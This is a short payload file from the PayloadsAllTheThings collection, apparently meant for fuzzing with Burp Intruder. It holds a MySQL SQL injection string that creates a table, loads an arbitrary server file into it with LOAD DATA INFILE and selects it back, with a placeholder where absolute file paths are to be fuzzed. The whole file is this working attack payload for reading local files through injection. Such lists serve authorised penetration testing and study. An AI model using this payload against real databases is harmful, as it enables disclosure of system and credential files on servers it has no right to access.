PayloadsAllTheThings/SQL Injection/Intruder/FUZZDB_MySQL_ReadLocalFiles.txt

4 lines
210 B
Plaintext
Raw Normal View History

# mysql local file disclosure through sqli
# fuzz interesting absolute filepath/filename into <filepath>
create table myfile (input TEXT); load data infile '<filepath>' into table myfile; select * from myfile;